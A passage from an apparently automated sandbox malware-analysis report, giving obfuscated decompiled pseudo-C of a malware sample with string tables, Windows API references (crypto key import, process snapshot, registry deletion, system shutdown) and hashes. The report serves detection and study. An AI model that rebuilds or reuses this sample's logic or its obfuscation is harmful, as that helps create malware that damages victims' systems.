						 *((intOrPtr*)(_t177 - 0x20)) =  *((intOrPtr*)(_t177 - 0x20)) - _t142;
					}
					 *0x5091ba = _t157;
					 *0x50bf13 = _t54;
					 *0x50ba0b =  *0x50ba0b - _t169;
					_t170 = _t169 + _t169;
					if(_t169 + _t169 == 0) {
						 *((intOrPtr*)(_t177 - 8)) = _t54;
						 *((intOrPtr*)(_t177 - 0xc)) = _t54;
					}
					_t99 = 0x2d976e;
					if(0x2d976e >= 0x3ab7) {
						_t99 = 0xa3c23;
					}
					_push( *0x5090b6);
					 *((intOrPtr*)(_t177 - 8)) = _t54;
					L00469469(_t99, _t170, 0xffffffffffff3086, "dpnet.dll");
					 *(_t177 - 0x1c) =  *(_t177 - 0x1c) - 0x3d9bb1;
					 *0x50bf0e =  *0x50bf0e + 0x6c1d;
					 *0x509146 =  *0x509146 + 0x6c1d;
					 *(_t177 - 0x10) = "api-ms-win-core-localization-l1-1-0.dll";
					_push( *0x50908c);
					 *0x50916a = 0x6c1d;
					_t161 =  *0x50919c; // 0xfa7f
					 *0x5091ce =  *0x5091ce - _t161;
					 *0x5091ea =  *0x5091ea - _t161;
					_t163 = _t161 + _t161 + 0x9c58ab;
					L00468D9F(0x415b2d, _t163, _t170, 0xffffffffffff3086, 1,  *((intOrPtr*)(_t177 - 8)));
					E00466493(0xffffffffffffffd5, 0x415b2d, 0xd83a, _t170, 0xffffffffffff3086, 1, 0);
					_t69 =  *((intOrPtr*)(_t177 - 8));
					_push( *0x50908c);
					 *0x50bf0e =  *0x50bf0e + 0xd83a;
					if(0xd83a > 0xd83a) {
						 *0x5091d8 = _t163;
						_t163 =  *0x50920c; // 0xe35a
						 *0x509242 =  *0x509242 - 0xffffffffffff3086;
					}
					 *((intOrPtr*)(_t177 - 8)) = _t69;
					 *((intOrPtr*)(_t177 - 0xc)) = _t69;
					 *(_t177 - 0x1c) = 0x776173;
					_t148 =  *0x50912c; // 0x5d7b
					_push( *0x50912a);
					_t74 =  *((intOrPtr*)(_t177 - 8));
					 *0x5090fc =  *0x5090fc - 0x3ef847;
					_t113 = 0x3ef847 - _t148;
					E00469D4E( *((intOrPtr*)(_t177 - 8)), _t113, _t148, _t170,  *((intOrPtr*)(_t177 - 8)), _t74);
					 *0x50bf0b =  *0x50bf0b - _t113;
					_push( *0x50908c);
					E0046624A("_isdel.exe", 0x60ff, _t163, _t170, 0xfffffffffffe610c, (_t113 >> _t148) + (_t113 >> _t148) + (_t113 >> _t148) + (_t113 >> _t148));
					_t118 = 0x49ca06;
					 *0x509124 =  *0x509124 - 0x60ff;
					_push( *0x509006);
					_t88 =  *((intOrPtr*)(_t177 - 8));
					if(0 < 0x2e) {
						_t118 = "RegDeleteKeyExW" + "RegDeleteKeyExW";
					}
					_t153 = 0x6d0f;
					 *((intOrPtr*)(_t177 - 8)) = _t88;
					E00469D4E(E00466493(_t88, _t118, 0x6d0f, _t170, 0xfffffffffffe610c, 1, _t88), _t118, 0x6d0f, _t170, 0, 1);
					_t92 =  *((intOrPtr*)(_t177 - 8));
					 *((intOrPtr*)(_t177 - 0x18)) = _t118;
					_push( *0x5090f0);
					 *((intOrPtr*)(_t177 - 8)) = _t92;
					if(_t92 > 0x19) {
						_t92 = _t92 + 0x24fbb3;
						 *(_t177 - 0x1c) = "WSManHTTPConfig.exe";
						_t153 = 0x684f;
					}
					_push(_t153);
					_push(E0046A3CE);
					_push(E0046624A);
					return _t92;
				}
				 *0x50bcf7 =  *0x50bcf7 + __edi;
				 *0x50bf17 = _t54;
				_t98 = "normaliz.dll" - _t54 + "normaliz.dll" - _t54 + 0x40;
				if(_t98 != _t98) {
					goto L4;
				}
				goto L2;
			}



















                      0x0046a04e
                      0x0046a054
                      0x0046a068
                      0x0046a07e
                      0x0046a083
                      0x0046a086
                      0x0046a08d
                      0x0046a093
                      0x0046a095
                      0x0046a09e
                      0x0046a0a6
                      0x0046a0d3
                      0x0046a0da
                      0x0046a0e0
                      0x0046a0e7
                      0x0046a0ea
                      0x0046a0f4
                      0x0046a0f4
                      0x0046a0fa
                      0x0046a0fa
                      0x0046a0ff
                      0x0046a10b
                      0x0046a110
                      0x0046a117
                      0x0046a11d
                      0x0046a11f
                      0x0046a11f
                      0x0046a12c
                      0x0046a12c
                      0x0046a138
                      0x0046a14a
                      0x0046a157
                      0x0046a15d
                      0x0046a162
                      0x0046a16f
                      0x0046a172
                      0x0046a175
                      0x0046a177
                      0x0046a181
                      0x0046a186
                      0x0046a195
                      0x0046a1a0
                      0x0046a1a7
                      0x0046a1b0
                      0x0046a1bb
                      0x0046a1df
                      0x0046a1e5
                      0x0046a1f6
                      0x0046a205
                      0x0046a20c
                      0x0046a216
                      0x0046a21d
                      0x0046a224
                      0x0046a22d
                      0x0046a250
                      0x0046a25b
                      0x0046a260
                      0x0046a263
                      0x0046a26a
                      0x0046a272
                      0x0046a279
                      0x0046a283
                      0x0046a28a
                      0x0046a28a
                      0x0046a293
                      0x0046a296
                      0x0046a2a5
                      0x0046a2ab
                      0x0046a2b2
                      0x0046a2c3
                      0x0046a2d1
                      0x0046a2d8
                      0x0046a2e0
                      0x0046a2ef
                      0x0046a305
                      0x0046a320
                      0x0046a32b
                      0x0046a330
                      0x0046a34e
                      0x0046a35d
                      0x0046a362
                      0x0046a36e
                      0x0046a36e
                      0x0046a373
                      0x0046a377
                      0x0046a386
                      0x0046a390
                      0x0046a393
                      0x0046a39b
                      0x0046a3a2
                      0x0046a3a7
                      0x0046a3a9
                      0x0046a3b8
                      0x0046a3be
                      0x0046a3be
                      0x0046a3c2
                      0x0046a3c3
                      0x0046a3c8
                      0x0046a3cd
                      0x0046a3cd
                      0x0046a0aa
                      0x0046a0b0
                      0x0046a0c9
                      0x0046a0ce
                      0x00000000
                      0x00000000
                      0x00000000

                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: #<$7.*$8 3$NtSetDriverEntryOrder$RegDeleteKeyExW$WSManHTTPConfig.exe$_isdel.exe$api-ms-win-core-localization-l1-1-0.dll$dpnet.dll$normaliz.dll$wuapi.dll
                      • API String ID: 0-2822638380
                      • Opcode ID: 29b41a23ed16ee31f4bc53995089e234d087008fac45b77517d481f4c27606a3
                      • Instruction ID: 247ef8051ac71f791f4d65835295639385eaa012c00a6ce7a54dd0cbe1e3d3b3
                      • Opcode Fuzzy Hash: 29b41a23ed16ee31f4bc53995089e234d087008fac45b77517d481f4c27606a3
                      • Instruction Fuzzy Hash: 1691B075B003069BDB00EFB9ECE56DD7BB0EB29310F04447AE984E7756E2740A85CB56
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004AEBD6 Relevance: 7.7, Strings: 6, Instructions: 178COMMON
                      Download Yara Rule
                      C-Code - Quality: 49%
                      			E004AEBD6() {
				void* _t38;
				intOrPtr _t42;
				char _t44;
				char* _t71;
				char* _t75;
				char* _t77;
				void* _t79;
				void* _t80;
				void* _t85;
				signed char _t86;
				short _t88;
				void* _t96;
				short _t97;
				signed char _t100;
				short _t102;
				void* _t106;
				void* _t111;
				unsigned short _t112;
				unsigned short _t113;
				void* _t116;

				_t97 = _t96 - 0x91df4e;
				_t28 = "InitiateSystemShutdownExA";
				if("InitiateSystemShutdownExA" != 0x138686) {
					L3:
					_t85 = _t85 + _t85;
					_t97 = 0x8c09;
					 *0x509212 = 0x8c09;
					L4:
					_push(1);
					L00468D9F(0x56, _t97, _t106, _t111, _t28 - 0xbe, 1);
					_push(0);
					_t86 = _t85 + 0x79;
					 *0x5091d2 = _t97;
					_t88 = _t86 + _t86 + 0x68cb;
					_t100 = 0x9819;
					_push(0);
					_push("WFServicesReg.exe");
					E004A800F();
					 *(_t116 - 0x10) = 0x41b390 >> _t86;
					_push(1);
					E004A800F();
					_push(0x9819);
					_push(1);
					_t38 = L00467ED3("WFServicesReg.exe", _t111);
					if(0x11 > 0) {
						L8:
						if(_t38 <= 0x13035d) {
							L10:
							 *0x5091fa = _t100;
							L11:
							 *0x509210 = _t100;
							 *0x50b62a =  *0x50b62a - _t111;
							 *((intOrPtr*)(_t116 - 8)) = _t116 - 0x5c;
							_t42 =  *((intOrPtr*)(_t116 - 8));
							if(_t88 >= _t88) {
								 *0x50917e = _t88;
								_t100 = 0x9570;
								 *0x509218 =  *0x509218 + 0x9570;
							}
							_t112 = _t111 + 0xa9628a;
							 *((intOrPtr*)(_t116 - 8)) = _t42;
							_t44 =  *((intOrPtr*)(_t116 - 8));
							_t71 = "MapUserPhysicalPages";
							 *(_t116 - 0x14) = _t71;
							if(_t71 == _t71) {
								if(_t71 <= _t71) {
									 *0x50914e = _t88;
								}
							}
							_t89 = 0x7ed4;
							 *0x5091ce =  *0x5091ce - _t100;
							_t102 = _t100 + _t100 + 0xa640;
							_t113 = _t112 >> 0x7ed4;
							_t75 =  *0x50bf14; // 0x0
							 *0x50bf17 = _t44;
							 *((intOrPtr*)(_t116 - 0x70)) = _t44;
							 *((intOrPtr*)(_t116 - 8)) = _t44;
							_t77 = _t75;
							if(0x18a298 < 0x1fb4db) {
								L22:
								if(_t89 >= _t89) {
									 *0x5091da =  *0x5091da + _t102;
								}
								goto L24;
							} else {
								 *(_t116 - 0x10) = _t77;
								_t79 = _t77 - 0x42e3;
								 *0x50bf0c =  *0x50bf0c + _t79;
								_t80 = _t79 + _t79;
								if(0x7ed4 < 0x7ed4) {
									 *0x5091a4 = _t102;
									_t102 = 0xa180;
									 *0x509228 =  *0x509228 + _t113;
									 *0x50bf12 =  *0x50bf12 + 0x18a298;
								}
								_t77 = _t80 + 0x35;
								if(_t77 != 0x3d) {
									L24:
									_push( *((intOrPtr*)(_t116 - 0x70)));
									 *((intOrPtr*)(_t116 - 0xc)) =  *((intOrPtr*)(_t116 - 8));
									_push(0x4aee58);
									goto ( *0x509d28);
								} else {
									 *(_t116 - 0x18) = _t77;
									_t89 = 0x5936cc;
									goto L22;
								}
							}
						}
						 *0x509178 = 0x640b;
						_t88 = 0xc816;
						if((_t100 & 0x0000008e) > 0) {
							goto L11;
						}
						goto L10;
					}
					if(0x800 == 0) {
						_t38 = 0xdd;
					}
					 *0x50bf07 =  *0x50bf07 + _t38;
					goto L8;
				}
				_t28 =  *(_t116 - 0x10);
				 *0x5090c6 =  *0x5090c6 - 0x2fcf8e;
				if(_t85 < _t85 || _t85 < _t85) {
					goto L3;
				} else {
					goto L4;
				}
			}























                      0x004aebd6
                      0x004aebdc
                      0x004aebe6
                      0x004aec05
                      0x004aec05
                      0x004aec07
                      0x004aec0b
                      0x004aec15
                      0x004aec18
                      0x004aec1f
                      0x004aec29
                      0x004aec2e
                      0x004aec31
                      0x004aec54
                      0x004aec62
                      0x004aec69
                      0x004aec77
                      0x004aec78
                      0x004aec7d
                      0x004aec80
                      0x004aec82
                      0x004aec8c
                      0x004aec8d
                      0x004aec8f
                      0x004aec97
                      0x004aecc1
                      0x004aecc6
                      0x004aece8
                      0x004aece8
                      0x004aecef
                      0x004aecef
                      0x004aecfa
                      0x004aed05
                      0x004aed11
                      0x004aed1b
                      0x004aed1d
                      0x004aed32
                      0x004aed36
                      0x004aed36
                      0x004aed3f
                      0x004aed47
                      0x004aed4c
                      0x004aed4f
                      0x004aed54
                      0x004aed59
                      0x004aed5e
                      0x004aed60
                      0x004aed60
                      0x004aed5e
                      0x004aed6a
                      0x004aed6e
                      0x004aed78
                      0x004aed7f
                      0x004aed86
                      0x004aed8c
                      0x004aed91
                      0x004aed94
                      0x004aeda4
                      0x004aedb3
                      0x004aee20
                      0x004aee22
                      0x004aee30
                      0x004aee30
                      0x00000000
                      0x004aedb5
                      0x004aedb5
                      0x004aedb8
                      0x004aedbd
                      0x004aedc3
                      0x004aedc7
                      0x004aedd0
                      0x004aeddd
                      0x004aede1
                      0x004aede8
                      0x004aedf8
                      0x004aee0e
                      0x004aee14
                      0x004aee37
                      0x004aee3f
                      0x004aee44
                      0x004aee47
                      0x004aee52
                      0x004aee16
                      0x004aee16
                      0x004aee1b
                      0x00000000
                      0x004aee1b
                      0x004aee14
                      0x004aedb3
                      0x004aecda
                      0x004aece1
                      0x004aece6
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004aece6
                      0x004aec9f
                      0x004aecaf
                      0x004aecaf
                      0x004aecbb
                      0x00000000
                      0x004aecbb
                      0x004aebe8
                      0x004aebf0
                      0x004aebff
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000

                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: IMCCPHR.exe$InitiateSystemShutdownExA$MapUserPhysicalPages$WFServicesReg.exe$WSManHTTPConfig.exe$activeds.dll
                      • API String ID: 0-1092097195
                      • Opcode ID: 8841a4c8c28e669aae19f29d91c15a29f8f4bd8b23fb50f30fb23d6c09cd46a0
                      • Instruction ID: 1e444521789988b19af727572d314d1e2668d7a6ad5a03ce4c01d64fcb007be3
                      • Opcode Fuzzy Hash: 8841a4c8c28e669aae19f29d91c15a29f8f4bd8b23fb50f30fb23d6c09cd46a0
                      • Instruction Fuzzy Hash: E5512469B406078BDB00AF79DC953CE3BB1EB3A324F08052AD824D73A6E3790949DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004B776F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptReleaseContext.ADVAPI32(?), ref: 004B783D
                      Strings
                      • dpnet.dll, xrefs: 004B78A9
                      • Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll, xrefs: 004B7858
                      • ucmhc.dll, xrefs: 004B787F
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: ContextCryptRelease
                      • String ID: Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$dpnet.dll$ucmhc.dll
                      • API String ID: 829835001-2037219039
                      • Opcode ID: 35eabc3f5b69a24b4a15323c02b9e612735fd2a5a6be210ac90e2503cf96c8cb
                      • Instruction ID: 5b1bf4178d016d0eeaf54669bf071c3488f063532e1a5eaf2e3cdc592f457f04
                      • Opcode Fuzzy Hash: 35eabc3f5b69a24b4a15323c02b9e612735fd2a5a6be210ac90e2503cf96c8cb
                      • Instruction Fuzzy Hash: CE418CB4E5420A9BCF00EFB9D8D85DEBBB0FB29324F50407AA844E7355E3385A89D750
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004B3B61 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77encryptionCOMMON
                      Download Yara Rule
                      C-Code - Quality: 29%
                      			E004B3B61(intOrPtr __eax, void* __ebx, void* __ecx, short __edx, void* __edi, void* __eflags) {
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t27;
				int _t30;
				char _t33;
				void* _t42;
				intOrPtr _t43;
				unsigned short _t50;
				short _t54;
				void* _t58;
				void* _t61;

				_t58 = __edi;
				_t54 = __edx;
				 *((intOrPtr*)(_t61 - 0x1c)) =  *((intOrPtr*)(_t61 - 0x1c)) + __ecx;
				 *((intOrPtr*)(_t61 - 8)) = __eax;
				 *((intOrPtr*)(_t61 - 0x18)) = 0x81d99b;
				_t23 =  *((intOrPtr*)(_t61 - 8));
				 *((intOrPtr*)(_t61 - 8)) = _t23;
				_push(_t23);
				L00468BBD(_t23, __edx);
				_t26 =  *((intOrPtr*)(_t61 - 8));
				_push(0);
				_t42 = 0x3fbb5b;
				 *((intOrPtr*)(_t61 - 8)) = _t26;
				if(_t26 <= 0x163dad) {
					 *0x5090d0 =  *0x5090d0 - 0x2b7473;
					_t42 = 0x56e8e6;
				}
				_t43 = _t42 + 0x57df;
				_t27 =  *((intOrPtr*)(_t61 - 8));
				_t50 = 0x5fc2 >> 0x5fc2;
				_push( *((intOrPtr*)(_t61 - 0x48)));
				 *((intOrPtr*)(_t61 - 8)) = _t27;
				if(_t27 < 0x1b) {
					L9:
					 *0x509128 =  *0x509128 + _t50;
					goto L10;
				} else {
					if(_t43 < 0x328a) {
						L6:
						 *((intOrPtr*)(_t61 - 0x24)) =  *((intOrPtr*)(_t61 - 0x24)) - _t50;
						_t54 = 0xa0ec;
						 *0x509226 = 0xa0ec;
						_t33 =  *0x50bf13; // -9
						 *0x50bf15 = _t33;
						 *0x509668 =  *0x509668 - _t58 - 0xcff825;
						 *0x509518 = 0xf4;
						if(0xf4 != 0x1bee || _t43 < 0x355653) {
							goto L9;
						}
						L10:
						 *0x5091da = _t54;
					} else {
						if(_t43 < _t43) {
							_t43 =  *((intOrPtr*)(_t61 - 0x1c));
							_t50 = 0x69bb;
							 *0x509170 =  *0x509170 + 0x69bb;
							goto L6;
						}
					}
				}
				 *0x50b22e =  *0x50b22e;
				_t30 = CryptReleaseContext(??, ??);
				 *0x509568 = _t30;
				return  *((intOrPtr*)(_t61 - 0x5c));
			}














                      0x004b3b61
                      0x004b3b61
                      0x004b3b6c
                      0x004b3b6f
                      0x004b3b7d
                      0x004b3b80
                      0x004b3b83
                      0x004b3b86
                      0x004b3b87
                      0x004b3b8f
                      0x004b3b94
                      0x004b3b95
                      0x004b3b9a
                      0x004b3ba2
                      0x004b3bac
                      0x004b3bb3
                      0x004b3bb3
                      0x004b3bb5
                      0x004b3bbe
                      0x004b3bc1
                      0x004b3bc7
                      0x004b3bca
                      0x004b3bcf
                      0x004b3c3a
                      0x004b3c3f
                      0x00000000
                      0x004b3bd1
                      0x004b3bd9
                      0x004b3bf0
                      0x004b3bf0
                      0x004b3bf9
                      0x004b3bfd
                      0x004b3c06
                      0x004b3c0c
                      0x004b3c19
                      0x004b3c20
                      0x004b3c29
                      0x00000000
                      0x004b3c38
                      0x004b3c52
                      0x004b3c52
                      0x004b3bdb
                      0x004b3bde
                      0x004b3be2
                      0x004b3be5
                      0x004b3be9
                      0x00000000
                      0x004b3be9
                      0x004b3bde
                      0x004b3bd9
                      0x004b3c65
                      0x004b3c6e
                      0x004b3c74
                      0x004b3c7d

                      APIs
                      • CryptReleaseContext.ADVAPI32(?,?,?), ref: 004B3C6E
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: ContextCryptRelease
                      • String ID: RtlReleaseRelativeName$SV5$st+
                      • API String ID: 829835001-2574096031
                      • Opcode ID: d89a7d26d0a86216760b684e993551476292340997ff74c3bf986ae641cd2055
                      • Instruction ID: e8dc4c8006a0ec7c266d397f5c738f28292400b43a18401d5e95d32d2c62cd31
                      • Opcode Fuzzy Hash: d89a7d26d0a86216760b684e993551476292340997ff74c3bf986ae641cd2055
                      • Instruction Fuzzy Hash: 52219479E003069BDB00EFB9E8955DDBFB0EB38320B44457AD841E731AE3785A4ADB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004B8E86 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 004B8E88
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CreateSnapshotToolhelp32
                      • String ID: _ui64toa_s$activeds.dll$api-ms-win-core-namedpipe-l1-1-0.dll
                      • API String ID: 3332741929-3656634258
                      • Opcode ID: 551a6195d923ab31afb6d34c714b8f12ff5e1725618d77e71cf9186b62d221b0
                      • Instruction ID: 6a24f68cae3ef29d6c43a329698d717df75aff52304d187eb265c54f8160fead
                      • Opcode Fuzzy Hash: 551a6195d923ab31afb6d34c714b8f12ff5e1725618d77e71cf9186b62d221b0
                      • Instruction Fuzzy Hash: 52219262B493468FE7119B78ECD92CD3B71973A320B0C092ECC54873A6E768094DEB59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004AF42D Relevance: 3.8, Strings: 3, Instructions: 87COMMON
                      Download Yara Rule
                      C-Code - Quality: 66%
                      			E004AF42D() {
				void* _t26;
				intOrPtr _t31;
				intOrPtr _t41;
				intOrPtr _t43;
				unsigned short _t44;
				intOrPtr _t64;
				intOrPtr _t65;
				short _t66;
				void* _t67;
				signed int _t68;
				void* _t70;
				void* _t71;
				void* _t73;
				short _t77;

				if(_t26 == 0x295367) {
					 *0x50bf0b =  *0x50bf0b + _t44;
				}
				_t61 = 0x5d62;
				_push( *((intOrPtr*)(_t73 - 0x74)));
				_t66 =  *0x5091b2; // 0x23e0
				 *0x509202 = _t66;
				_t67 = _t66 + _t66;
				_t31 =  *((intOrPtr*)(_t73 - 8));
				 *((intOrPtr*)(_t73 - 0x14)) = _t31;
				if((_t44 >> 0x5d62) - 0x40 >= 0x3a) {
					 *0x50913a = 0x5d62;
					_t65 =  *0x50916c; // 0x0
					_t61 = _t65 - 0x72d99b;
					_t77 = _t61;
				}
				 *((intOrPtr*)(_t73 - 8)) = _t31;
				_push( *((intOrPtr*)(_t73 + 8)));
				E004ACC6C(0 + 0x433989, _t61, _t67, _t70, _t71, _t77,  *((intOrPtr*)(_t73 - 8)));
				_t41 =  *((intOrPtr*)(_t73 - 8));
				if(0x433989 < 0x3d46) {
					 *0x509160 = 0x5cd0;
					_t64 =  *0x509192; // 0x9624
					_t61 = _t64 - 0x843c;
					_t67 = 0;
				}
				 *((intOrPtr*)(_t73 - 8)) = _t41;
				_t43 =  *((intOrPtr*)(_t73 - 8));
				_push( *((intOrPtr*)(_t73 - 0x60)));
				 *0x50bf0f =  *0x50bf0f - _t61;
				if(_t61 < _t61) {
					L9:
					if(_t43 < 0) {
						 *0x50938c = _t43;
					}
					goto L12;
				} else {
					_t68 = _t67 + 0x8653;
					if((_t68 & 0x00869d5a) >= 0) {
						L12:
						_push(E004AF56D);
						goto ( *0x509ca4);
					}
					 *0x509200 = _t68;
					goto L9;
				}
			}

















                      0x004af432
                      0x004af434
                      0x004af434
                      0x004af43f
                      0x004af456
                      0x004af459
                      0x004af460
                      0x004af467
                      0x004af471
                      0x004af474
                      0x004af47a
                      0x004af482
                      0x004af48c
                      0x004af493
                      0x004af493
                      0x004af493
                      0x004af49c
                      0x004af4c2
                      0x004af4c9
                      0x004af4d3
                      0x004af4db
                      0x004af4e4
                      0x004af4eb
                      0x004af4f2
                      0x004af4fb
                      0x004af4fb
                      0x004af502
                      0x004af50a
                      0x004af515
                      0x004af518
                      0x004af520
                      0x004af546
                      0x004af548
                      0x004af54a
                      0x004af54a
                      0x00000000
                      0x004af522
                      0x004af522
                      0x004af52d
                      0x004af55a
                      0x004af55c
                      0x004af567
                      0x004af567
                      0x004af52f
                      0x00000000
                      0x004af544

                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: :$F=$_isdel.exe
                      • API String ID: 0-1020594911
                      • Opcode ID: 69f2468ce64e4ea9d5a12a22d6e7df0a52eb4ca31ddd4aebb5222c1d1d868dc8
                      • Instruction ID: 626155428d94295765ed1551991dd3ef19cdaf25fc962a4917612fd6598ce19f
                      • Opcode Fuzzy Hash: 69f2468ce64e4ea9d5a12a22d6e7df0a52eb4ca31ddd4aebb5222c1d1d868dc8
                      • Instruction Fuzzy Hash: EA315831E00206AFCB00DFB9D8C46CDBBB1EF3A314F04856A9955E7326D2348A49DB08
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004C3A08 Relevance: 1.5, APIs: 1, Instructions: 35encryptionCOMMON
                      Download Yara Rule
                      C-Code - Quality: 40%
                      			E004C3A08(void* __eax) {
				HCRYPTKEY* _t19;
				void* _t25;

				if(__eax == 0) {
					L3:
					return  *((intOrPtr*)(_t25 - 0x30));
				} else {
					 *(_t25 - 0x24) = _t25 - 8;
					if(CryptImportKey( *(_t25 - 4),  *(_t25 + 8),  *(_t25 + 0xc), 0, 0,  *(_t25 - 0x24)) == 0) {
						goto L3;
					} else {
						 *(_t25 - 0x10) =  *(_t25 - 0x20);
						_push(0);
						_t19 = _t25 - 0x10;
						 *(_t25 - 0x24) = _t19;
						_push( *(_t25 - 0x24));
						_push(0);
						_push(0);
						_push(1);
						_push(0);
						_push( *(_t25 - 8));
						_push(E004C3A61);
						_push( *0x50a240);
						return _t19;
					}
				}
			}





                      0x004c3a0a
                      0x004c3b47
                      0x004c3b4b
                      0x004c3a10
                      0x004c3a13
                      0x004c3a30
                      0x00000000
                      0x004c3a36
                      0x004c3a39
                      0x004c3a3e
                      0x004c3a3f
                      0x004c3a42
                      0x004c3a45
                      0x004c3a48
                      0x004c3a4c
                      0x004c3a4d
                      0x004c3a51
                      0x004c3a52
                      0x004c3a55
                      0x004c3a5a
                      0x004c3a60
                      0x004c3a60
                      0x004c3a30

                      APIs
                      • CryptImportKey.ADVAPI32(?,?,?,00000000,?,?), ref: 004C3A28
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CryptImport
                      • String ID:
                      • API String ID: 365355273-0
                      • Opcode ID: 3cc5714685345be94b29c4de71ee53b806c07b360f6bb290a4da0adef1b9c332
                      • Instruction ID: a51f42aea2575d448185ba76987689caaca00c0671abf59feb8653b2a4698406
                      • Opcode Fuzzy Hash: 3cc5714685345be94b29c4de71ee53b806c07b360f6bb290a4da0adef1b9c332
                      • Instruction Fuzzy Hash: 4DF0C47A900219AEDF11CFA5CD45EEEBFB5FB08744F104169E904A2150D7729E14EB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004B544E Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004B544E() {
				char _v20;
				struct _SYSTEMTIME* _v24;
				struct _SYSTEMTIME* _t4;

				_t4 =  &_v20;
				_v24 = _t4;
				GetLocalTime(_v24);
				return _t4;
			}






                      0x004b5454
                      0x004b5457
                      0x004b545d
                      0x004b5463

                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: LocalTime
                      • String ID:
                      • API String ID: 481472006-0
                      • Opcode ID: 3ef689930f447c095d30e2da109ef63eb57562a23fc2cf66033b373fb9c4da3e
                      • Instruction ID: ebc7179c63c22954c45e4f9e8422d2a8e84e6f0c7e5e4edc722305024557a26b
                      • Opcode Fuzzy Hash: 3ef689930f447c095d30e2da109ef63eb57562a23fc2cf66033b373fb9c4da3e
                      • Instruction Fuzzy Hash: 92C04C7080020E8BCB00DBA4DD469BEB6BDBB40214B5002619921F12D1E7719B1089E6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004B2E2B Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                      Download Yara Rule
                      C-Code - Quality: 67%
                      			E004B2E2B() {
				signed char _t18;
				signed char _t22;
				char _t25;
				intOrPtr _t28;
				intOrPtr _t37;
				short _t42;
				void* _t45;
				signed int _t47;
				void* _t50;

				_t28 = 0x42bb59;
				_t18 =  *(_t50 - 8);
				 *(_t50 - 8) = _t18;
				if(_t18 < 0x24) {
					L4:
					 *0x50920e = _t42;
					if((_t47 & 0x00988653) <= 0) {
						 *0x50b921 =  *0x50b921 - _t47;
						_t25 =  *0x50bf15; // 0x0
						_t18 = _t25 - 0xf5;
					}
					 *0x50b93d =  *0x50b93d + _t45;
					 *((intOrPtr*)(_t50 - 0x10)) =  *((intOrPtr*)(_t50 - 0x10)) + _t28;
					 *((intOrPtr*)(_t50 - 0x10)) = _t28;
					_t22 =  *(_t50 - 8);
					_push( *((intOrPtr*)(_t50 - 0x50)));
					_t37 =  *0x509146; // 0x380
					if(_t37 < _t37) {
